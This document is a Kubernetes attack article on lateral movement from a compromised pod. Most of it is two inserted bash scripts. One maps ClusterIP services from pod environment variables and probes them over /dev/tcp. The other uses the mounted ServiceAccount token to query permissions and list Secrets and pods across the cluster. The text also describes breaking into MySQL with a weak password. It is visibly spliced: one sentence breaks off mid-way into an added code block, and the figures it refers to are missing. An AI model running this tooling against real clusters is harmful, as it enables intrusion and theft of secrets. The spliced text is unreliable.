Viewing K8S Cluster Security from the Perspective of Attackers (Part 2)

Viewing K8S Cluster Security from the Perspective of Attackers (Part 1) summarized the attack methods against K8S components, services exposed on nodes, business pods, and container escape techniques, each mapped to an attack point. This article continues with the remaining attack points: lateral attacks, attacks on the K8S management platform, attacks on image registries, and attacks on third-party components.

Attack point: Lateral attack

Attack other services

Clusters often run internal services that are exposed only through a ClusterIP. They cannot be scanned from outside the cluster, but once an attacker is inside a pod, the information-gathering techniques described in Part 1 (scanning the ports reachable from the pod, reading the pod's environment variables, and so on) frequently reveal sensitive services. Kubernetes injects a pair of SERVICE_HOST and SERVICE_PORT variables, named after each service, into every pod for the services that existed in its namespace when the pod started, so the environment alone is often a complete inventory of what the pod can reach.
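As an added example (not code from the original post), the following script does the environment-variable part of that information gathering from inside a pod: it turns the injected service variables into a list of ClusterIP targets and probes each one. The env snapshot, service names and addresses are constructed for illustration; the probe relies on bash's /dev/tcp so it works in a stripped-down container without nc or nmap.

```bash
# Added example, not from the original post: list ClusterIP services from the
# environment variables the kubelet injects into every pod, then probe them.

# Constructed snapshot of what `env` prints in a compromised pod (illustrative
# service names and addresses).
SAMPLE_ENV='PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
HOSTNAME=web-7d4f9b6c8-xk2lp
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
MYSQL_SERVICE_HOST=10.96.12.34
MYSQL_SERVICE_PORT=3306
MYSQL_PORT=tcp://10.96.12.34:3306
MYSQL_PORT_3306_TCP_ADDR=10.96.12.34
REDIS_MASTER_SERVICE_HOST=10.96.45.67
REDIS_MASTER_SERVICE_PORT=6379
REDIS_MASTER_SERVICE_PORT_REDIS=6379
HOME=/root'

# services_from_env: read `env` output on stdin, print "NAME HOST PORT" per service.
# Only the bare *_SERVICE_HOST / *_SERVICE_PORT pair is used; the per-port variants
# (*_SERVICE_PORT_HTTPS, *_PORT_3306_TCP_ADDR, ...) are ignored so each service
# appears exactly once.
services_from_env() {
    awk -F= '
        /^[A-Z0-9_]+_SERVICE_HOST=/ { n=$1; sub(/_SERVICE_HOST$/, "", n); host[n]=$2 }
        /^[A-Z0-9_]+_SERVICE_PORT=/ { n=$1; sub(/_SERVICE_PORT$/, "", n); port[n]=$2 }
        END { for (n in host) if (n in port) print n, host[n], port[n] }
    ' | sort
}

# probe_tcp HOST PORT: TCP connect through bash's /dev/tcp. Exit 0 means the
# port accepted the connection. `timeout` is from coreutils; drop it on images
# that lack it (then a filtered port hangs until the kernel gives up).
probe_tcp() {
    timeout 3 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# scan_services: what you would actually run inside the pod (real env, real probes).
scan_services() {
    env | services_from_env | while read -r name host port; do
        if probe_tcp "$host" "$port"; then state=open; else state=closed; fi
        printf '%-16s %s:%s %s\n' "$name" "$host" "$port" "$state"
    done
}

# Offline demonstration against the constructed snapshot (no network traffic):
printf '%s\n' "$SAMPLE_ENV" | services_from_env
```

Run scan_services inside the pod to get the live list. The MySQL and Redis entries are the kind of thing the post describes finding: services with no exposure outside the cluster and, often, no authentication worth the name inside it.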

During an earlier internal penetration test we found the address of the MySQL service in the environment variables of the target pod, as shown in the figure:

We then logged in to the MySQL database by trying a weak password:

Attack API Server

Pods in a K8S cluster authenticate to the API Server with their ServiceAccount token. This is an attack point: if the pod's ServiceAccount has been granted overly broad permissions, an attacker who gains code execution in the pod can talk to the API Server with those permissions and read sensitive cluster information (Secrets, for example), perform privileged operations, or go further and take control of the cluster.

By default the token is mounted in the pod at /run/secrets/kubernetes.io/serviceaccount/token (the mount point is /var/run/secrets/kubernetes.io/serviceaccount, which on most images is the same directory because /var/run is a symlink to /run), next to the ca.crt and namespace files. In an actual attack, the address of the API Server can generally
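As an added example (not code from the original post), the following script shows how the mounted token is used against the API Server from inside a pod: decode the token to learn which ServiceAccount you hold, ask the API Server what that identity is allowed to do (the equivalent of kubectl auth can-i --list), then attempt the reads that matter. It assumes the in-cluster defaults: the token, ca.crt and namespace files under the directory above, and the API Server address taken from the KUBERNETES_SERVICE_HOST / KUBERNETES_SERVICE_PORT variables the kubelet injects (falling back to the kubernetes.default.svc name). The sample token built inside the script is constructed with a fake signature so the decoding can be exercised offline.

```bash
# Added example, not from the original post: ServiceAccount token recon against
# the API Server. SA_DIR and APISERVER follow the in-cluster defaults.
SA_DIR=${SA_DIR:-/run/secrets/kubernetes.io/serviceaccount}
APISERVER="https://${KUBERNETES_SERVICE_HOST:-kubernetes.default.svc}:${KUBERNETES_SERVICE_PORT:-443}"

# The token is a JWT; its payload names the namespace and ServiceAccount, which
# tells you whose permissions you are about to use before you use them.
b64url() { printf '%s' "$1" | base64 | tr -d '\n=' | tr '+/' '-_'; }
jwt_payload() {
    p=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
    case $(( ${#p} % 4 )) in 2) p="$p==" ;; 3) p="$p=" ;; esac   # restore padding
    printf '%s' "$p" | base64 -d
}
jwt_sub() { jwt_payload "$1" | sed -n 's/.*"sub":"\([^"]*\)".*/\1/p'; }

# Constructed sample token (header.payload.fake-signature) for offline use; a
# real token carries an RSA or EC signature from the cluster's signing key.
make_sample_token() {
    h=$(b64url '{"alg":"RS256","kid":"sample"}')
    p=$(b64url '{"iss":"kubernetes/serviceaccount","kubernetes.io/serviceaccount/namespace":"default","kubernetes.io/serviceaccount/service-account.name":"default","sub":"system:serviceaccount:default:default"}')
    printf '%s.%s.%s' "$h" "$p" "not-a-real-signature"
}

# api METHOD PATH [extra curl args]: authenticated request to the API Server,
# validating its certificate with the mounted cluster CA.
api() {
    method=$1; path=$2; shift 2
    curl -sS --cacert "$SA_DIR/ca.crt" \
        -H "Authorization: Bearer $(cat "$SA_DIR/token")" \
        -H 'Content-Type: application/json' \
        -X "$method" "$@" "$APISERVER$path"
}

# sa_recon: identity, then the permission list, then the reads an attacker
# wants. A 403 on the Secrets listings means least privilege is holding; a 200
# on /api/v1/secrets means every Secret in the cluster is readable with this token.
sa_recon() {
    ns=$(cat "$SA_DIR/namespace")
    echo "identity: $(jwt_sub "$(cat "$SA_DIR/token")")"
    api POST /apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
        -d "{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"spec\":{\"namespace\":\"$ns\"}}"
    api GET "/api/v1/namespaces/$ns/secrets"   # namespace-scoped Secrets
    api GET /api/v1/secrets                     # cluster-wide Secrets
    api GET /api/v1/pods                        # pods in every namespace: next hops for lateral movement
}

# Offline demonstration: decode the constructed token; no API call is made.
jwt_sub "$(make_sample_token)"
```

Run sa_recon inside the pod; the two Secrets listings are the quickest test of whether the ServiceAccount is over-privileged. On the defensive side the same script doubles as a check: pods that do not need the API Server should set automountServiceAccountToken: false, and any ServiceAccount that does need it should be bound to a Role scoped to exactly the resources it uses, so that sa_recon returns nothing but 403s.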
